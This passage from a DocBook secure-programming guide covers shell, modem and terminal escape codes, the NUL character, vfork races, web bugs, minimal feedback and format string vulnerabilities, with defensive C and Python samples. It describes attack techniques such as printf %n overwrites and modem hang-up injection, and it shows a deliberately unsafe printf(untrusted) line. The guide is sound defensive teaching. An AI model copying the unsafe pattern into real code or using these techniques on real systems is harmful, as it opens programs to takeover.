of commands.
|
||
As a result, apparently-innocent commands such as
|
||
``mail admin < file-from-user'' can be used to execute arbitrary programs.
|
||
Interactive programs such as vi, emacs, and ed have ``escape'' mechanisms
|
||
that allow users to run arbitrary shell commands from their session.
|
||
Always examine the documentation of programs you call to search for
|
||
escape mechanisms.
|
||
It's best if you call only programs intended for use by other programs; see
|
||
<xref linkend="call-intentional-apis">.
|
||
</para>
|
||
|
||
<para>
|
||
The issue of avoiding
|
||
escape codes even goes down to low-level hardware components
|
||
and emulators of them.
|
||
Most modems implement the so-called ``Hayes'' command set.
|
||
Unless the command set is disabled, inducing
|
||
a delay, the phrase ``+++'', and then another delay forces the modem
|
||
to interpret any following text as commands to the modem instead.
|
||
This can be used to implement denial-of-service attacks (by
|
||
sending ``ATH0'', a hang-up command) or even forcing
|
||
a user to connect to someone else (a sophisticated attacker could
|
||
re-route a user's connection through a machine under the attacker's control).
|
||
For the specific case of modems, this is easy to counter
|
||
(e.g., add "ATS2=255" in the modem initialization string), but the
|
||
general issue still holds: if you're controlling a lower-level component,
|
||
or an emulation of one, make sure that you disable or otherwise handle
|
||
any escape codes built into them.
|
||
</para>
|
||
|
||
<para>
|
||
Many ``terminal'' interfaces implement the escape
|
||
codes of ancient, long-gone physical terminals like the VT100.
|
||
These codes can be useful, for example, for bolding characters,
|
||
changing font color, or moving to a particular location
|
||
in a terminal interface.
|
||
However, do not allow arbitrary untrusted data to be sent directly
|
||
to a terminal screen, because some of those codes can cause serious problems.
|
||
On some systems you can remap keys (e.g., so when a user presses
|
||
"Enter" or a function key it sends the command you want them to run).
|
||
On some you can even send codes to
|
||
clear the screen, display a set of commands you'd like the victim to run,
|
||
and then send that set ``back'', forcing the victim to run
|
||
the commands of the attacker's choosing without even waiting for a keystroke.
|
||
This is typically implemented using ``page-mode buffering''.
|
||
This security problem is why emulated tty's (represented as device files,
|
||
usually in /dev/) should only be writeable by
|
||
their owners and never anyone else - they should never have
|
||
``other write'' permission set, and unless only the user is a member of
|
||
the group (i.e., the ``user-private group'' scheme), the ``group write''
|
||
permission should not be set either for the terminal [Filipski 1986].
|
||
If you're displaying data to the user at a (simulated) terminal, you probably
|
||
need to filter out all control characters (characters with values less
|
||
than 32) from data sent back to
|
||
the user unless they're identified by you as safe.
|
||
If worst comes to worst, you can identify tab and newline (and maybe
|
||
carriage return) as safe, removing all the rest.
|
||
Characters with their high bits set (i.e., values greater than 127)
|
||
are in some ways trickier to handle; some old systems implement them as
|
||
if they weren't set, but simply filtering them inhibits much international
|
||
use.
|
||
In this case, you need to look at the specifics of your situation.
|
||
</para>
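<para>
A minimal Python sketch of such a filter follows. It assumes that only
tab and newline are considered safe, and it leaves characters with
values of 127 and above untouched, since handling those depends on
your situation. The names used are illustrative.
</para>

```python
# Control characters that this sketch treats as safe to display.
SAFE_CONTROLS = {"\t", "\n"}


def strip_control_chars(text: str) -> str:
    """Remove characters below 32 unless they are explicitly listed as safe."""
    return "".join(ch for ch in text if ord(ch) >= 32 or ch in SAFE_CONTROLS)
```

<para>
Removing the escape character (value 27) is what disarms a terminal
escape sequence; the printable characters that followed it are then
displayed as ordinary text.
</para>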
|
||
|
||
<para>
|
||
A related problem is that the NUL character (character 0) can have
|
||
surprising effects.
|
||
Most C and C++ functions assume
|
||
that this character marks the end of a string, but string-handling routines
|
||
in other languages (such as Perl and Ada95) can handle strings containing NUL.
|
||
Since many libraries and kernel calls use the C convention, the result
|
||
is that what is checked is not what is actually used [rfp 1999].
|
||
</para>
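<para>
The mismatch is easy to demonstrate in Python, whose strings may
contain character 0. In this sketch, c_view imitates what a routine
following the C convention would see; both function names are
hypothetical.
</para>

```python
def c_view(name: str) -> str:
    """Return the part of the string a C-style routine would actually use."""
    return name.split("\0", 1)[0]


def reject_nul(name: str) -> str:
    """Refuse any value containing character 0 before it goes any further."""
    if "\0" in name:
        raise ValueError("embedded character 0 in input")
    return name
```

<para>
For example, the name "report.txt\0.jpg" passes a check that it ends
in ".jpg", but c_view shows that a C routine would use "report.txt".
Rejecting such input outright is usually simpler than trying to keep
the two views consistent.
</para>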
|
||
|
||
<para>
|
||
When calling another program or referring to a file
|
||
always specify its full path (e.g., <filename>/usr/bin/sort</filename>).
|
||
<!-- I believe a Corel vulnerability is based on "sort" not being listed
|
||
as /usr/bin/sort -->
|
||
For program calls,
|
||
this will eliminate possible errors in calling the ``wrong'' command,
|
||
even if the PATH value is incorrectly set.
|
||
For other file referents, this reduces problems from ``bad'' starting
|
||
directories.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="call-intentional-apis">
|
||
<title>Call Only Interfaces Intended for Programmers</title>
|
||
|
||
<para>
|
||
Call only application programming interfaces (APIs) that are
|
||
intended for use by programs.
|
||
Usually a program can invoke any other program,
|
||
including those that are really designed for human interaction.
|
||
However, it's usually unwise to invoke a program intended for human
|
||
interaction in the same way a human would.
|
||
The problem is that programs' human interfaces are intentionally rich
|
||
in functionality and are often difficult to completely control.
|
||
As discussed in <xref linkend="handle-metacharacters">,
|
||
interactive programs often have ``escape'' codes,
|
||
which might enable an attacker to perform undesirable functions.
|
||
Also, interactive programs often try to intuit the ``most likely'' defaults;
|
||
this may not be the default you were expecting, and an attacker may find
|
||
a way to exploit this.
|
||
</para>
|
||
|
||
<para>
|
||
Examples of programs you shouldn't normally call directly include
|
||
mail, mailx, ed, vi, and emacs.
|
||
At the very least, don't call these without checking
|
||
their input first.
|
||
</para>
|
||
|
||
<para>
|
||
Usually there are parameters to give you safer access to the program's
|
||
functionality,
|
||
or a different API or application that's intended for use by programs;
|
||
use those instead.
|
||
For example, instead of invoking a text editor to edit some text
|
||
(such as ed, vi, or emacs), use sed where you can.
|
||
</para>
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="check-returns">
|
||
<title>Check All System Call Returns</title>
|
||
|
||
<para>
|
||
Every system call that can return an error condition must have that
|
||
error condition checked.
|
||
One reason is that nearly all system calls require limited system resources,
|
||
and users can often affect resources in a variety of ways.
|
||
Setuid/setgid programs can have limits set on them through calls such as
|
||
setrlimit(2) and nice(2).
|
||
External users of server programs and CGI scripts
|
||
may be able to cause resource exhaustion simply by making a large number
|
||
of simultaneous requests.
|
||
If the error cannot be handled gracefully, then fail safe as discussed earlier.
|
||
</para>
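<para>
As an illustration, here is a sketch of a wrapper around write(2) that
checks every return value; the name write_all() is hypothetical.
It retries interrupted calls, continues after short writes, and
reports any other failure to the caller rather than ignoring it:
<programlisting>
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <unistd.h>

/* Hypothetical helper: write all len bytes of buf to fd.
   Returns 0 on success, -1 on error (errno is left as write(2) set it). */
int write_all(int fd, const void *buf, size_t len)
{
    const char *p = buf;

    assert(buf != NULL || len == 0);
    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;            /* interrupted: try again */
            return -1;               /* real failure: report it */
        }
        p += n;                      /* short write: keep going */
        len -= (size_t)n;
    }
    return 0;
}
```
]]>
</programlisting>
The caller still has to decide what to do when -1 comes back; for a
secure program that usually means failing safe.
</para>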
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-vfork">
|
||
<title>Avoid Using vfork(2)</title>
|
||
|
||
<para>
|
||
The portable way to create new processes in Unix-like systems
|
||
is to use the fork(2) call.
|
||
BSD introduced a variant called vfork(2) as an optimization technique.
|
||
In vfork(2), unlike fork(2), the child borrows the parent's memory
|
||
and thread of control until a call to execve(2) or an exit occurs;
|
||
the parent process is suspended while the child is using its resources.
|
||
The rationale is that in old BSD systems, fork(2) would actually cause
|
||
memory to be copied while vfork(2) would not.
|
||
Linux never had this problem; because Linux uses copy-on-write
semantics internally, it only copies pages when they change
|
||
(actually, there are still some tables that have to be copied; in most
|
||
circumstances their overhead is not significant).
|
||
Nevertheless, since some programs depend on vfork(2),
|
||
recently Linux implemented the BSD vfork(2) semantics
|
||
(previously vfork(2) had been an alias for fork(2)).
|
||
</para>
|
||
|
||
<para>
|
||
There are a number of problems with vfork(2).
|
||
From a portability point-of-view,
|
||
the problem with vfork(2) is that it's actually fairly tricky for a
|
||
process to not interfere with its parent, especially in high-level languages.
|
||
The ``not interfering'' requirement applies to the actual machine code
|
||
generated, and many compilers generate hidden temporaries and other
|
||
code structures that cause unintended interference.
|
||
The result: programs using vfork(2) can easily fail when the code changes
|
||
or even when compiler versions change.
|
||
</para>
|
||
|
||
<para>
|
||
For secure programs it gets worse on Linux systems, because
|
||
Linux (at least 2.2 versions through 2.2.17) is vulnerable to a
|
||
race condition in vfork()'s implementation.
|
||
If a privileged process uses a vfork(2)/execve(2) pair in Linux
|
||
to execute user commands, there's a race condition
|
||
while the child process is already running as the user's
|
||
UID, but hasn't entered execve(2) yet.
|
||
The user may be able to send signals, including SIGSTOP, to this process.
|
||
Due to the semantics of
|
||
vfork(2), the privileged parent process would then be blocked as well.
|
||
As a result, an unprivileged process could cause the privileged process
|
||
to halt, resulting in a denial-of-service of the privileged process' service.
|
||
FreeBSD and OpenBSD, at least, have code to specifically deal with this
|
||
case, so to my knowledge they are not vulnerable to this problem.
|
||
My thanks to Solar Designer, who noted and documented this
|
||
problem in Linux on the ``security-audit'' mailing list on October 7, 2000.
|
||
<!--
|
||
http://www.geocrawler.com/search/?config=302&words=Designer+vfork
|
||
http://www.geocrawler.com/archives/3/302/2000/10/0/4460856/
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
The bottom line with vfork(2) is simple:
|
||
<emphasis remap="it">don't</emphasis> use vfork(2) in your programs.
|
||
This shouldn't be difficult; the primary use of vfork(2) is to support old
|
||
programs that needed vfork's semantics.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="embedded-content-bugs">
|
||
<title>Counter Web Bugs When Retrieving Embedded Content</title>
|
||
<para>
|
||
Some data formats can embed references to content that is automatically
|
||
retrieved when the data is viewed (not waiting for a user to select it).
|
||
If it's possible to cause this data to be retrieved through the
|
||
Internet (e.g., through the World Wide Web), then there is a
|
||
potential to use this capability to obtain information about readers
|
||
without the readers' knowledge, and in some cases to force the reader
|
||
to perform activities without the reader's consent.
|
||
This privacy concern is sometimes called a ``web bug.''
|
||
</para>
|
||
|
||
<para>
|
||
In a web bug, a reference is intentionally inserted into a document
|
||
and used by the content author to track
|
||
who, where, and how often a document is read.
|
||
The author can also essentially watch how a ``bugged'' document
|
||
is passed from one person to another or from one organization to another.
|
||
</para>
|
||
|
||
<para>
|
||
The HTML format has had this issue for some time.
|
||
According to the
|
||
<ulink url="http://www.privacyfoundation.org">Privacy Foundation</ulink>:
|
||
<blockquote>
|
||
<para>
|
||
Web bugs are used extensively today by Internet
|
||
advertising companies on Web pages and
|
||
in HTML-based email messages for tracking.
|
||
They are typically 1-by-1 pixel in size to make them
|
||
invisible on the screen to disguise the fact that they are used for tracking.
|
||
However, they could be any image (using the img tag);
other HTML tags can also implement web bugs, e.g., frames,
form invocations, and scripts.
|
||
By itself, invoking the web bug will provide the ``bugging'' site the
|
||
reader IP address, the page that the reader visited, and various information
|
||
about the browser; by also using cookies it's often possible to determine
|
||
the specific identity of the reader.
|
||
A survey about web bugs is available at
|
||
<ulink url="http://www.securityspace.com/s_survey/data/man.200102/webbug.html">http://www.securityspace.com/s_survey/data/man.200102/webbug.html</ulink>.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
What is more concerning is that other document formats seem to have
|
||
such a capability, too.
|
||
When viewing HTML from a web site with a web browser, there are other
|
||
ways of getting information on who is browsing the data, but when
|
||
viewing a document in another format from an email few users expect
|
||
that the mere act of reading the document can be monitored.
|
||
However, for many formats, reading a document can be monitored.
|
||
For example, it has been recently determined that Microsoft Word can
|
||
support web bugs;
|
||
see
|
||
<ulink url="http://www.privacyfoundation.org/advisories/advWordBugs.html">the Privacy Foundation advisory</ulink> for more information.
|
||
As noted in their advisory,
|
||
recent versions of Microsoft Excel and Microsoft PowerPoint can also
|
||
be bugged.
|
||
In some cases, cookies can be used to obtain even more information.
|
||
</para>
|
||
|
||
<para>
|
||
Web bugs are primarily an issue with the design of the file format.
|
||
If your users value their privacy, you probably will want to limit the
|
||
automatic downloading of included files.
|
||
One exception might be when the file itself is being downloaded
|
||
(say, via a web browser); downloading other files from the same location
|
||
at the same time is much less likely to concern users.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="hide-sensitive-information">
|
||
<title>Hide Sensitive Information</title>
|
||
<para>
|
||
Sensitive information should be hidden from prying eyes, both while
|
||
being input and output, and when stored in the system.
|
||
Sensitive information certainly includes credit card numbers,
|
||
account balances, and home addresses, and in many applications
|
||
also includes names, email addresses, and other private information.
|
||
</para>
|
||
|
||
<para>
|
||
Web-based applications should encrypt all communication with a user
|
||
that includes sensitive information; the usual way is to use the
|
||
"https:" protocol (HTTP on top of SSL or TLS).
|
||
According to the HTTP 1.1 specification (IETF RFC 2616 section 15.1.3),
|
||
authors of services which use the HTTP protocol <emphasis>should not</emphasis>
|
||
use GET based forms for the submission of sensitive data,
|
||
because this will cause this data to be encoded in the Request-URI.
|
||
Many existing servers, proxies, and user agents will log
|
||
the request URI in some place where it might be visible to third parties.
|
||
Instead, use POST-based submissions, which are intended for
|
||
this purpose.
|
||
</para>
|
||
|
||
<para>
|
||
Databases of such sensitive data should also be encrypted on any storage
|
||
device (such as files on a disk).
|
||
Such encryption doesn't protect against an attacker breaking the secure
|
||
application, of course, since obviously the application
|
||
has to have a way to access the encrypted data too.
|
||
However, it <emphasis>does</emphasis> provide some defense against
|
||
attackers who manage to get backup disks of the data
|
||
but not of the keys used to decrypt them.
|
||
It also provides some defense if an attacker doesn't manage to break
|
||
into an application, but does manage to partially break into a related
|
||
system just enough to view the stored data - again, they now have to
|
||
break the encryption algorithm to get the data.
|
||
There are many circumstances where data can be transferred unintentionally
|
||
(e.g., core files), which this also prevents.
|
||
It's worth noting, however, that this is not as strong a defense as you'd
|
||
think, because often the server itself can be subverted or broken.
|
||
</para>
|
||
</sect1>
|
||
</chapter>
|
||
|
||
<chapter id="output">
|
||
<title>Send Information Back Judiciously</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 26:4 (NIV)</attribution>
|
||
<para>
|
||
Do not answer a fool according to his folly,
|
||
or you will be like him yourself.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<sect1 id="minimize-feedback">
|
||
<title>Minimize Feedback</title>
|
||
|
||
<para>
|
||
Avoid giving much information to untrusted users; simply succeed or fail,
|
||
and if it fails just say it failed and minimize information on why it failed.
|
||
Save the detailed information for audit trail logs.
|
||
For example:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
If your program requires some sort of user authentication
|
||
(e.g., you're writing a network service or login program),
|
||
give the user as little information as possible before they authenticate.
|
||
In particular, avoid giving away the version number of your program
|
||
before authentication.
|
||
Otherwise,
|
||
if a particular version of your program is found to have a vulnerability,
|
||
then users who don't upgrade from that version advertise to attackers that
|
||
they are vulnerable.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
If your program accepts a password, don't echo it back;
|
||
this creates another way passwords can be seen.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
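<para>
For the password case, one possible approach on POSIX systems is to
switch off terminal echo with termios while the password is typed.
The following is a sketch only; read_password() is a hypothetical
name, and a production version would also need to cope with signals
arriving while echo is disabled:
<programlisting>
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

/* Hypothetical helper: read one line from terminal fd into buf with
   echo disabled.  Returns 0 on success, -1 on failure (for example,
   fd is not a terminal, or the line does not fit in buf). */
int read_password(int fd, char *buf, size_t size)
{
    struct termios saved, noecho;
    size_t used = 0;
    ssize_t n = 0;
    int too_long = 0;
    char c;

    assert(buf != NULL && size > 0);
    buf[0] = '\0';
    if (tcgetattr(fd, &saved) != 0)
        return -1;                   /* not a terminal, or bad fd */
    noecho = saved;
    noecho.c_lflag &= ~(tcflag_t)ECHO;
    if (tcsetattr(fd, TCSAFLUSH, &noecho) != 0)
        return -1;

    while ((n = read(fd, &c, 1)) == 1 && c != '\n') {
        if (used + 1 < size)
            buf[used++] = c;
        else
            too_long = 1;            /* keep draining the line */
    }
    buf[used] = '\0';

    /* Always try to restore the terminal, even after a failed read. */
    if (tcsetattr(fd, TCSAFLUSH, &saved) != 0 || n < 0 || too_long) {
        memset(buf, 0, size);        /* hand back nothing on failure */
        return -1;
    }
    return 0;
}
```
]]>
</programlisting>
Note that the failure paths follow the advice above as well: the caller
learns only that reading failed, not how much of the password was seen.
</para>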
|
||
</sect1>
|
||
|
||
<sect1 id="no-comments">
|
||
<title>Don't Include Comments</title>
|
||
|
||
<para>
|
||
When returning information, don't include any ``comments'' unless you're
|
||
sure you want the receiving user to be able to view them.
|
||
This is a particular problem for web applications that generate files
|
||
(such as HTML).
|
||
Often web application programmers wish to comment their work
|
||
(which is fine), but instead of simply leaving the comment in their code,
|
||
the comment is included as part of the generated file (usually HTML or XML)
|
||
that is returned to the user.
|
||
The trouble is that these comments sometimes provide insight into how
|
||
the system works in a way that aids attackers.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="handle-full-output">
|
||
<title>Handle Full/Unresponsive Output</title>
|
||
|
||
<para>
|
||
It may be possible for a user to clog or make unresponsive a secure
|
||
program's output channel back to that user.
|
||
For example, a web browser could be intentionally halted or have its
|
||
TCP/IP channel response slowed.
|
||
The secure program should handle such cases; in particular, it should release
|
||
locks quickly (preferably before replying) so that this will not create
|
||
an opportunity for a Denial-of-Service attack.
|
||
Always place time-outs on outgoing network-oriented write requests.
|
||
</para>
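<para>
One way to place a time-out on a write, sketched here under the
assumption of a POSIX system with poll(2), is to put the descriptor in
non-blocking mode and wait a bounded time for it to become writable.
The helper names set_nonblocking() and write_with_timeout() are
hypothetical:
<programlisting>
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <unistd.h>

/* Hypothetical helper: put fd into non-blocking mode so that write(2)
   can never stall the program.  Returns 0 on success, -1 on error. */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL);

    if (flags < 0)
        return -1;
    return fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0 ? -1 : 0;
}

/* Hypothetical helper: wait up to timeout_ms for fd to accept data,
   then do one write(2).  Returns the number of bytes written (which
   may be fewer than len), or -1 with errno set; errno is ETIMEDOUT
   if the receiver did not drain the channel in time. */
ssize_t write_with_timeout(int fd, const void *buf, size_t len,
                           int timeout_ms)
{
    struct pollfd pfd;
    int ready;

    assert(buf != NULL || len == 0);
    pfd.fd = fd;
    pfd.events = POLLOUT;
    pfd.revents = 0;

    do {
        ready = poll(&pfd, 1, timeout_ms);
    } while (ready < 0 && errno == EINTR);  /* restarts the full wait */

    if (ready < 0)
        return -1;
    if (ready == 0) {
        errno = ETIMEDOUT;
        return -1;
    }
    return write(fd, buf, len);
}
```
]]>
</programlisting>
On a time-out the program can release its locks, log the event, and
drop the connection, instead of waiting indefinitely on a client that
has stopped reading.
</para>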
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="control-formatting">
|
||
<title>Control Data Formatting (Format Strings/Formatation)</title>
|
||
|
||
<para>
|
||
A number of output routines in computer languages have a
|
||
parameter that controls the generated format.
|
||
In C, the most obvious example is the printf() family of routines
|
||
(including printf(), sprintf(), snprintf(), fprintf(), and so on).
|
||
Other examples in C include syslog() (which writes system log information)
|
||
and setproctitle() (which sets the string used to display
|
||
process identifier information).
|
||
Many functions with names beginning with ``err'' or ``warn'', containing
|
||
``log'', or ending in ``printf'' are worth considering.
|
||
<!-- log() style functions calling v* in particular -->
|
||
<!-- Some info from 7/21/2000, Theo de Raadt on Bugtraq -->
|
||
<!-- OpenBSD docs for setproctitle() is at
|
||
http://www.rocketaware.com/man/man3/setproctitle.3.htm -->
|
||
Python includes the "%" operation, which on strings controls formatting
|
||
in a similar manner.
|
||
Many programs and libraries define formatting functions, often by
|
||
calling built-in routines and doing additional processing
|
||
(e.g., glib's g_snprintf() routine).
|
||
</para>
|
||
|
||
<para>
|
||
Format languages are essentially little programming languages - so
|
||
developers who let attackers control the format string are essentially
|
||
running programs written by attackers!
|
||
Surprisingly, many people seem to forget the power of these formatting
|
||
capabilities, and use data from untrusted users as the formatting parameter.
|
||
The guideline here is clear -
|
||
never use unfiltered data from an untrusted user as the format parameter.
|
||
Failing to follow this guideline usually results in a
|
||
format string vulnerability (also called a formatation vulnerability).
|
||
Perhaps this is best shown by example:
|
||
<programlisting width="61">
|
||
/* Wrong way: */
|
||
printf(string_from_untrusted_user);
|
||
/* Right ways: */
|
||
printf("%s", string_from_untrusted_user); /* safe */
|
||
 fputs(string_from_untrusted_user, stdout); /* better for simple strings */
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
If an attacker controls the formatting information,
|
||
an attacker can cause all sorts of mischief by carefully
|
||
selecting the format.
|
||
The case of C's printf() is a good example -
|
||
there are lots of ways to possibly exploit user-controlled format strings
|
||
in printf().
|
||
These include
|
||
buffer overruns by creating a long formatting string (this can
|
||
result in the attacker having complete control over the program),
|
||
conversion specifications that use unpassed parameters
|
||
(causing unexpected data to be inserted), and
|
||
creating formats which produce totally unanticipated result values
|
||
(say by prepending or appending awkward data,
|
||
causing problems in later use).
|
||
A particularly nasty case is printf's
|
||
%n conversion specification, which writes the
|
||
number of characters written so far into the pointer argument;
|
||
using this, an attacker can overwrite a value that was intended for printing!
|
||
An attacker can even overwrite almost arbitrary locations, since the attacker
|
||
can specify a ``parameter'' that wasn't actually passed.
|
||
The %n conversion specification has been a standard part of C since its
|
||
beginning, is required by all C standards, and is used by real programs.
|
||
In 2000, Greg KH did a quick search of source code and identified the programs
|
||
BitchX (an irc client), Nedit (a program editor), and
|
||
SourceNavigator (a program editor / IDE / Debugger) as using %n, and there
|
||
are doubtless many more.
|
||
Deprecating %n would probably be a good idea, but even without %n there
|
||
can be significant problems.
|
||
<!--
|
||
Crispin Cowan posted the list at:
|
||
http://lists.insecure.org/lists/vuln-dev/2000/Sep/0050.html
|
||
Immediately added forgotten credit at:
|
||
http://lists.insecure.org/lists/vuln-dev/2000/Sep/0061.html
|
||
Greg KH mentions further:
|
||
http://lists.insecure.org/lists/vuln-dev/2000/Sep/0053.html
|
||
(He just searched some source code he had on hand).
|
||
|
||
-->
|
||
Many papers discuss these attacks in more detail; for example, see
|
||
<ulink url="http://www-syntim.inria.fr/fractales/Staff/Raynal/LinuxMag/SecProg/Art4/index.html">Avoiding security holes
|
||
when developing an application - Part 4: format strings</ulink>.
|
||
<!--
|
||
For a detailed description of how these format strings can be exploited,
|
||
see the following post on Bugtraq:
|
||
Subject: Howto exploit a remote format bug automatically
|
||
From: Frédéric Raynal frederic.raynal@inria.fr
|
||
Date: Thu, 18 Apr 2002 16:25:37 +0200
|
||
To: bugtraq@securityfocus.com
|
||
|
||
Also, see Fredrik Widlund (fredrik.widlund@defcom.com)'s "fox" program.
|
||
From the 19 April 2002 Bugtraq notice:
|
||
"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
|
||
locally and remotely. Runs on OpenBSD and not ported to other platforms,
|
||
though it should be very straighforward.
|
||
|
||
The only requirement is that you get the actual printed string back to the
|
||
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
|
||
small shell program since the output occurs in the process listing.
|
||
|
||
Should work for exploiting bugs on most little-endian 32bit-machines like the
|
||
i386 providing you supply the shellcode.
|
||
|
||
Includes a trivial local example, and an example of how to point it at the
|
||
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.
|
||
|
||
|
||
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
Since in many cases the results are sent back to the user,
|
||
this attack can also be used to expose internal information about the stack.
|
||
This information can then be used to circumvent stack protection systems
|
||
such as StackGuard and ProPolice; StackGuard uses constant ``canary'' values
|
||
to detect attacks, but if the stack's contents can be displayed,
|
||
the current value of the canary will be exposed, suddenly making the
|
||
software vulnerable again to stack smashing attacks.
|
||
<!-- Fri, 21 Jul 2000 12:21:20 -0400,
|
||
From: Alan DeKok <aland@STRIKER.OTTAWA.ON.CA>
|
||
Subject: StackGuard with ... Re: [Paper] Format bugs.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
A formatting string should almost always be a constant string,
|
||
possibly involving a function call to implement a
|
||
lookup for internationalization (e.g., via gettext's _()).
|
||
Note that this
|
||
lookup must be limited to values that the program controls, i.e., the
|
||
user must be allowed to only select from the message files controlled
|
||
by the program.
|
||
It's possible to filter user data before using it (e.g., by designing
|
||
a filter listing legal characters for the format string such as [A-Za-z0-9]),
|
||
but it's usually better to simply prevent the problem
|
||
by using a constant format string or fputs() instead.
|
||
Note that although I've listed this as an ``output'' problem, this can
|
||
cause problems internally to a program before output
|
||
(since the output routines may be saving to a file, or even just generating
|
||
internal state such as via snprintf()).
|
||
</para>
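<para>
The same rule applies when the ``output'' is only an internal buffer.
As a minimal sketch (copy_untrusted() is a hypothetical helper name),
untrusted text can be copied with snprintf() using a constant format,
so that any conversion specifications it contains are treated as
ordinary characters:
<programlisting>
<![CDATA[
```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: copy untrusted text into dst as plain data.
   The format is the constant "%s", so nothing inside untrusted is
   ever interpreted as a conversion specification.
   Returns 0 on success, -1 if the text did not fit (dst then holds
   a truncated but terminated copy). */
int copy_untrusted(char *dst, size_t size, const char *untrusted)
{
    int n;

    assert(dst != NULL && size > 0 && untrusted != NULL);
    n = snprintf(dst, size, "%s", untrusted);
    if (n < 0 || (size_t)n >= size)
        return -1;                   /* output error or truncation */
    return 0;
}
```
]]>
</programlisting>
Given the input ``%n%x'', the buffer ends up holding exactly those
four characters; had the input been passed as the format itself,
snprintf() would have tried to act on them.
</para>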
|
||
|
||
<para>
|
||
The problem of input formatting causing security problems
|
||
is not an idle possibility; see CERT Advisory CA-2000-13
|
||
for an example of an exploit using this weakness.
|
||
For more information on how these problems can be exploited, see
|
||
Pascal Bouchareine's email article titled ``[Paper] Format bugs'',
|
||
published in the July 18, 2000 edition of
|
||
<ulink url="http://www.securityfocus.com">Bugtraq</ulink>.
|
||
<!-- This paper can be hard to extract, but it's there -->
|
||
As of December 2000,
|
||
developmental versions of the gcc compiler support warning messages for
|
||
insecure format string usages, in an attempt to help developers avoid
|
||
these problems.
|
||
<!-- John Levon passed this information on to me; as of Dec 11, 2000, this
|
||
was in the CVS version of gcc -->
|
||
</para>
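<para>
These compiler checks can be extended to your own formatting
functions.
The sketch below assumes GCC or a compatible compiler such as Clang;
the format attribute is a compiler extension rather than standard C,
and the names PRINTF_LIKE and log_line() are hypothetical:
<programlisting>
<![CDATA[
```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>

/* Compiler extension (assumed available when __GNUC__ is defined):
   ask for printf-style checking of the format at argument fmt_idx,
   with the variable arguments starting at argument first_arg. */
#if defined(__GNUC__)
#define PRINTF_LIKE(fmt_idx, first_arg) \
    __attribute__((format(printf, fmt_idx, first_arg)))
#else
#define PRINTF_LIKE(fmt_idx, first_arg)
#endif

/* Hypothetical logging wrapper: formats one line into buf.
   Returns 0 on success, -1 on truncation or output error. */
int log_line(char *buf, size_t size, const char *fmt, ...)
    PRINTF_LIKE(3, 4);

int log_line(char *buf, size_t size, const char *fmt, ...)
{
    va_list ap;
    int n;

    assert(buf != NULL && size > 0 && fmt != NULL);
    va_start(ap, fmt);
    n = vsnprintf(buf, size, fmt, ap);
    va_end(ap);
    return (n < 0 || (size_t)n >= size) ? -1 : 0;
}
```
]]>
</programlisting>
When compiled with options such as -Wall -Wformat-security, a call
that passes a non-constant string as fmt with no further arguments
should then draw a warning, just as a direct call to printf() would.
</para>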
|
||
|
||
<para>
|
||
Of course, this all raises the question of whether the
|
||
internationalization lookup is, in fact, secure.
|
||
If you're creating your own internationalization lookup routines,
|
||
make sure that an untrusted user can only specify a legal locale and not
|
||
something else like an arbitrary path.
|
||
</para>
|
||
|
||
<para>
|
||
Clearly, you want to limit the strings created through internationalization
|
||
to ones you can trust.
|
||
Otherwise, an attacker could use this ability to exploit the
|
||
weaknesses in format strings, particularly in C/C++ programs.
|
||
This has been an item of discussion in Bugtraq (e.g., see
|
||
John Levon's Bugtraq post on July 26, 2000).
|
||
For more information, see the discussion on
|
||
permitting users to only select legal language values in
|
||
<xref linkend="locale-legal-values">.
|
||
</para>
|
||
|
||
<para>
|
||
Although it's really a programming bug, it's worth mentioning that
|
||
different countries notate numbers in different ways; in particular,
|
||
both the period (.) and comma (,) are used to separate an integer
|
||
from its fractional part. If you save or load data, you need to make sure
|
||
that the active locale does not interfere with data handling.
|
||
Otherwise, a French user may not be able to exchange data with an
|
||
English user, because the data stored and retrieved will use
|
||
different separators.
|
||
I'm unaware of this being used as a security problem, but it's conceivable.
|
||
</para>
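<para>
One way to keep stored data independent of the user's locale, shown
here only as a sketch, is to switch the numeric locale to ``C'' while
formatting values for storage and then restore it.
The helper name format_double_portable() is hypothetical, and because
setlocale() changes process-wide state this approach is not suitable
for multi-threaded programs:
<programlisting>
<![CDATA[
```c
#include <assert.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: format value into buf using a period as the
   decimal separator, whatever the active locale is.
   Returns 0 on success, -1 on failure. */
int format_double_portable(char *buf, size_t size, double value)
{
    const char *current;
    char *saved;
    int n;

    assert(buf != NULL && size > 0);
    current = setlocale(LC_NUMERIC, NULL);   /* query only */
    if (current == NULL)
        return -1;
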